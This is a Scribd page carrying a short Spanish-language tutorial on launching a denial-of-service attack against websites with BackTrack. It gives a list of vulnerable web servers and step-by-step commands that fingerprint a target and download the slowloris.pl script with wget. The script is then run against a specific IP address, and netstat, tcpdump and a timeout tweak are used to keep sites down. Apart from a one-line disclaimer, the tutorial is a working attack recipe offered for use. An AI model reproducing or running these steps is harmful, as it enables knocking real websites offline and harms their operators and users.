Scribd Logo
Upload

Welcome to Scribd!

  • Ataque en DoS Con BackTrack

    Uploaded by

    Andres Hernandez
    10 views8 pages

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    10 views8 pages

    Ataque en DoS Con BackTrack

    Uploaded by

    Andres Hernandez

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 8

    ataque dos a paginas web

    Por freakshit23

    ataques dos
    disclaimer
    les recuerdo que este manual es para aprendizaje y no para abuso ni otros usos, no me hago resposable del mal uso de este. Reconocer una web compatible. para esto vamos a necesitar /pentest/enumeration/web/whatweb ruby whatweb www.lapaginaquedeseasprobar.com

    ataques dos

    podemos ver aqui que la pagina a la que queremos atacar esta en perfectas condiciones

    ahora vamos a empezar con este metodo... en la ultima hoja les mostre como quedo la pagina web despues de aplicarle un ataque en dos.

    ataques dos
    aqui podemos ver que tenemos un httpserver apache esto quiere decir que la pagina es compatible para hacerle este metodo asi que por ahora continuemos aqui una lista de los servidores que permiten este servicio Servers que si funcionan *Apache 1.x *Apache 2.x *dhttpd *GoAhead WebServer servers que no funcionan *IIS6.0 *IIS7.0 *lighttpd *Squid *nginx *Cisco CSS

    ataques dos
    1.- para usar slowloris baJAMOS LO SIGUIENTE perl -MCPAN -e install GetOpt::Long perl -MCPAN -e install IO::Socket::INET perl -MCPAN -e install IO::Socket::SSL 2.- descargar el archivo slowloris.pl wget http://ha.ckers.org/slowloris/slowloris.pl 3.- ahora lo ejecutaremos en el host que queremos perl slowloris.pl -dns 66.7.216.73

    ataques dos
    4.- con netstat podemos ver como la web esta bloqueada netstat -tpan

    5.- podemos meter un tcpdump para mantener la peticion viva tcpdump -nni wlan0 -s 0 -w /tmp/slowloris.pcap port 80

    ataques dos
    podemos reducir el impacto del ataque a la web cambiando la variable del timeout perl slowloris.pl -dns 66.7.216.73 -timeout 600 esto hara que el ataque sea mas lento y pueda manter mas tiempo viva la sesion ahora podemos ver como a quedado la pagina

    al darle ctrl+c cortamos el proceso de slowloris y podemos ver que la pagina ya puede cargarse perfectamente

    ataques dos
    wlan0 = interface que varia dependiendo de nuestros equipos -timeout 600 = variable en segundos para limitar el trafico 66.7.216.73 = esta es la direccion ip de la pagina que queremos atacar; esta la podemos sacar con el comando de la pagina 1 ctrl+c = detiene los procesos

    You might also like